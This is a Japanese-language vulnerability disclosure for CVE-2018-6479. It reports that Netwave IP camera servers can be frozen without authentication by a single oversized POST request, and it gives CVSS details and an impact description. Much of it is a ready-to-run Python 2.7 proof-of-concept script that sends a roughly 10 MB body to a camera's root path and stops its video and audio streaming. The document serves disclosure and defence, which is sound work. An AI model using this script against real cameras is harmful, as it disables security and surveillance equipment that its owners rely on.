
[CVE-2018-6479] Netwave IPカメラサーバーは、1つの巨大なPOSTリクエストによってサービス拒否(DoS)攻撃に対して脆弱です。
| CVE | 説明 |
|---|---|
| CVE-2018-6479 | 認証不要のリモートサービス拒否脆弱性 |
| CVSS | スコア | 詳細 |
|---|---|---|
| 3 | 7.3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X |
IoTセキュリティ研究の過程で、さまざまなIPカメラベンダーにいくつかの脆弱性が発見されました。Netwave IP Cameraは、カメラ映像の視聴と管理を可能にするIPカメラサーバーです。IPカメラは特に物理的なセキュリティや制御目的で使用されるため、その可用性は極めて重要です。
任意のNetwave IP Cameraは、ルートパスに巨大なPOSTリクエストを送信するだけでダウンさせることができます。リクエストを送信すると、デバイスはフリーズし、オーディオとビデオのストリーミングが停止します。
概念実証: 以下のPython 2.7スクリプトを任意のNetWave IP Cameraに対して実行すると、即座に応答とビデオ/オーディオのストリーミングが停止します。
import string
import httplib
import urllib2
host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body
headers = {
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}
url = "/"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data
Gonzalo García León